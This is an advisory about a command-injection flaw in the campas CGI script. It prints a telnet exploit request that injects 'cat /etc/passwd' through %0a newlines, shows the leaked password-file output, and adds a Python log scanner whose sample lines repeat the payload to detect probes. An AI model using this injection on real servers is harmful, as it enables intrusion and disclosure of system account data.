COMMAND

    campas.cgi

SYSTEMS AFFECTED

    Systems with this CGI

PROBLEM

    Francisco Torres posted about the following CGI security bug.

    CGI:    campas
            #!/bin/sh
            #pragma ident "@(#)campas.sh    1.2 95/05/24 NCSA"

    With this CGI it is possible to execute commands. The exploit
    passes the command in the query string, separated by URL-encoded
    newlines (%0a):

        > telnet www.xxxx.net 80
        Trying 200.xx.xx.xx...
        Connected to venus.xxxx.net
        Escape character is '^]'.
        GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a
        <PRE>
        root:x:0:1:Super-User:/export/home/root:/sbin/sh
        daemon:x:1:1::/:
        bin:x:2:2::/usr/bin:
        sys:x:3:3::/:
        adm:x:4:4:Admin:/var/adm:
        lp:x:71:8:Line Printer Admin:/usr/spool/lp:
        smtp:x:0:0:Mail Daemon User:/:/bin/false
        .... continue :P

SOLUTION

    Either erase this CGI if it is not in use, or stop using it (at
    which point you can erase it too).
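
    To check whether the CGI has been probed with the request shown under
    PROBLEM, the following added example (not part of the original advisory)
    scans access-log lines for requests to campas whose query string decodes
    to control characters; it goes beyond the single %0a case to cover other
    control bytes and nested percent-encoding. The Common Log Format, the
    /cgi-bin/campas path prefix and the sample lines are assumptions.

```python
import re
from urllib.parse import unquote, unquote_to_bytes

# Common Log Format; the protocol token is optional because the request
# shown on this page is sent without one (HTTP/0.9 style).
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) ([^\s"]+)(?: [^"]*)?" (\d{3})')

def control_bytes(query, max_rounds=3):
    """Control bytes (< 0x20 or 0x7f) present in the percent-decoded query."""
    data, found = query.encode("latin-1", "replace"), set()
    for _ in range(max_rounds):  # repeated so nested encodings (%250a) are seen too
        decoded = unquote_to_bytes(data)
        found.update(b for b in decoded if b < 0x20 or b == 0x7F)
        if decoded == data:
            break
        data = decoded
    return sorted(found)

def scan(lines, prefix="/cgi-bin/campas"):
    """Return one record per request to the script whose query hides control bytes."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we can parse
        client, when, method, target, status = m.groups()
        path, _, query = target.partition("?")
        if not unquote(path).startswith(prefix):  # assumed install path of the CGI
            continue
        found = control_bytes(query)
        if found:
            hits.append({"client": client, "time": when, "status": int(status),
                         "control_bytes": ["0x%02x" % b for b in found]})
    return hits

# Constructed sample log lines (documentation addresses, invented timestamps).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2000:10:00:00 +0000] "GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a" 200 512',
    '192.0.2.11 - - [01/Jan/2000:10:00:05 +0000] "GET /cgi-bin/campas?campus=main HTTP/1.0" 200 830',
    '198.51.100.7 - - [01/Jan/2000:10:01:00 +0000] "GET /cgi-bin/campas?a%250d%250ab HTTP/1.0" 200 95',
    '198.51.100.8 - - [01/Jan/2000:10:02:00 +0000] "GET /index.html?q=%0a HTTP/1.0" 200 1204',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

    A hit with status 200 means the script was present and answered the
    request, so that host should be reviewed and the CGI removed as described
    under SOLUTION.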